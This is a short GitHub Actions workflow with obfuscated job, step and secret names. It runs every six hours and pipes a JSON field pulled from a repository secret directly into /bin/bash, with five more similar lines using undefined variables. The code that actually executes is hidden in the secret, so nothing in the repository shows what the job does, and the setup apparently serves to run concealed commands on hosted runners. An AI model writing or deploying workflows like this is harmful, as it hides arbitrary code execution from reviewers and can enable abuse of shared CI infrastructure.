name: renhengxing4567

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: renhengxing4567
        env:
          ri04: ${{ secrets.ri04 }}
        run: |
          echo $ri04 | jq -r .rnkfk98956 | /bin/bash
          echo $bdn1721 | jq -r .cae876 | /bin/bash
          echo $dnvbx82027 | jq -r .lpq5911 | /bin/bash
          echo $ux18 | jq -r .dfhxp5 | /bin/bash
          echo $jklcz4 | jq -r .qc2 | /bin/bash
          echo $ibbgw7882 | jq -r .vmfnz382 | /bin/bash

